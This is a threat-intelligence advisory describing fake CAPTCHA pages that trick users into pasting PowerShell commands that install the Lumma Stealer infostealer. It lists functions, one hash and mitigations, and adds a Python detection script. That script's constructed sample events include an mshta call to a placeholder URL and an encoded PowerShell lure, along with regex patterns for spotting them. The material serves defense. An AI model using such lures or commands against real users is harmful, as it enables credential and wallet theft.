Cybercriminals Leverage Fake CAPTCHAs for Malware Delivery
Threat Group: Unknown
Threat Type: Malvertising, Phishing
Exploited Vulnerabilities: Social Engineering, Malvertising Networks
Malware Used: Lumma Stealer
Threat Score: High (8.5/10) – Due to its widespread reach, advanced obfuscation techniques, and ability to harvest sensitive data.
Last Threat Observation: December 2024 (Multiple Security Sources)
Overview
Cybercriminals are increasingly exploiting fake CAPTCHA verification pages to distribute malware, notably the Lumma Stealer, through large-scale malvertising campaigns. These deceptive tactics manipulate users into executing malicious scripts under the guise of verifying their humanity, leading to unauthorized access to sensitive information. The campaign, identified as "DeceptionAds," leverages ad networks to propagate over a million ad impressions daily across thousands of websites, significantly amplifying its reach and potential impact.
The attack chain typically begins with users clicking on malicious advertisements or links, redirecting them to counterfeit CAPTCHA pages. These pages prompt users to perform actions such as copying and executing a PowerShell command, which, unbeknownst to them, initiates the download and installation of the Lumma Stealer malware. Once installed, Lumma Stealer harvests browser-stored passwords, cookies, cryptocurrency wallet credentials, and other sensitive data. The malware's distribution through seemingly legitimate ad networks and its sophisticated obfuscation techniques make detection and prevention particularly challenging, underscoring the need for heightened vigilance and robust cybersecurity measures.
Key Details
Delivery Method:
- Users encounter fake CAPTCHA pages through malicious ads, phishing emails, or links associated with pirated software.
- Fake CAPTCHAs prompt users to execute malicious scripts disguised as legitimate verification actions.
Target:
- Individuals seeking free or pirated content.
- Developers receiving phishing emails targeting platforms like GitHub.
Functions:
- Credential Harvesting: Extracts browser-stored passwords, cookies, and cryptocurrency wallet credentials.
- Data Collection: Captures autofill form data, including credit card information.
- 2FA Token Theft: Gathers Two-Factor Authentication (2FA) tokens and backup codes.
- Malware Deployment: Acts as a loader for additional malware payloads.
- Persistence Mechanisms: Establishes persistence through scheduled tasks and startup modifications.
Obfuscation:
- Script Encoding: Uses Base64 and other encoding methods.
- Trusted Utility Abuse: Leverages legitimate Windows utilities like mshta.exe to bypass detection.
- Dynamic Loading: Fetches and executes payloads on demand to avoid static analysis.
Attack Vectors
- Malvertising:
- Users clicking on malicious ads are redirected to fake CAPTCHA pages.
- Upon interacting, a PowerShell command is silently copied to the clipboard; when the user pastes and runs it as the page instructs, it downloads and installs Lumma Stealer.
- Phishing Emails:
- Targets receive phishing emails impersonating trusted services (e.g., GitHub).
- These emails direct users to fake CAPTCHA pages deploying similar clipboard-based malware installation techniques.
Known Indicators of Compromise (IoCs)
FileHash-MD5:
7a0525921ff54f1193db83d7303c6ee8
Domains:
Hostnames:
Mitigation and Prevention
- User Awareness: Educate users on the risks of executing scripts from untrusted sources.
- Email Filtering: Implement robust email filters to block phishing attempts.
- Antivirus Protection: Keep antivirus software updated to detect malware like Lumma Stealer.
- Two-Factor Authentication (2FA): Enforce 2FA to add security layers.
- Monitor Logs: Regularly review system and network logs for unusual activities.
- Regular Updates: Keep software and systems patched against vulnerabilities.
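One way to act on the "Monitor Logs" item above against the clipboard-to-PowerShell chain described under Key Details and Attack Vectors, as an added detection example (not code from the original advisory or any of its sources): it classifies process-creation records by the traits the page names, mshta.exe fetching a remote URL, a Base64-encoded PowerShell command, CAPTCHA-style lure text, and a parent of explorer.exe (the Run dialog). The event records, field names and hostnames are constructed assumptions, not real telemetry or indicators.

```python
import base64
import re

# Constructed sample process-creation records (hypothetical, not real telemetry):
# parent process name plus full command line, as a Sysmon/EDR feed would expose them.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": "mshta https://placeholder.invalid/verify.html"},
    {"parent": "explorer.exe", "cmd": "powershell -w hidden -enc " + base64.b64encode(
        "# CAPTCHA Verification - verify you are human".encode("utf-16-le")).decode()},
    {"parent": "explorer.exe", "cmd": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"parent": "cmd.exe", "cmd": "powershell -File C:\\scripts\\backup.ps1"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
LURE_RE = re.compile(r"captcha|verif|not a robot|human", re.IGNORECASE)


def decode_encoded_command(cmd: str) -> str:
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or ''."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid Base64
        return ""


def classify(event: dict) -> list[str]:
    """Return the reasons an event matches the fake-CAPTCHA chain (empty list = benign)."""
    cmd = event["cmd"]
    parts = cmd.split()
    exe = parts[0].rsplit("\\", 1)[-1].lower() if parts else ""
    reasons: list[str] = []
    if exe in ("mshta", "mshta.exe") and URL_RE.search(cmd):
        reasons.append("mshta launched with a remote URL")
    if exe in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            reasons.append("Base64-encoded PowerShell command")
        if LURE_RE.search(decoded) or LURE_RE.search(cmd):
            reasons.append("CAPTCHA-style lure text inside the command")
    # The pasted command is launched from the Run dialog, so its parent is explorer.exe.
    if reasons and event["parent"].lower() == "explorer.exe":
        reasons.append("parent is explorer.exe (consistent with a Run-dialog paste)")
    return reasons


def scan(events: list[dict]) -> list[tuple[str, list[str]]]:
    return [(e["cmd"], r) for e in events if (r := classify(e))]
```

Feed real Sysmon Event ID 1 or EDR process-creation records into scan() in place of SAMPLE_EVENTS; the decoded command text is also worth retaining for triage, since the encoded form hides the download URL.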
Risk Assessment
The fake CAPTCHA campaign presents a significant threat due to its deceptive nature, exploiting user trust in standard web security procedures. The campaign’s scale, with millions of daily ad impressions across thousands of sites, highlights its potential for causing extensive data breaches and financial losses.
Conclusion
To counter the growing threat posed by fake CAPTCHA campaigns, organizations must adopt a proactive cybersecurity approach. This includes deploying advanced threat detection systems, conducting regular employee awareness training, and enforcing multi-layered security protocols. Additionally, maintaining up-to-date threat intelligence and sharing information with industry peers can bolster collective defense efforts. By staying ahead of evolving cyber tactics, businesses can better safeguard their digital assets and reduce the likelihood of successful attacks.
Sources:
- BleepingComputer - Malicious ads push Lumma infostealer via fake CAPTCHA pages
- Infosecurity Magazine - Fake Captcha Campaign Highlights Risks of Malvertising Networks
- The Hacker News - DeceptionAds Delivers 1M+ Daily Impressions via 3,000 Sites
- Alienvault - Indicators of Compromise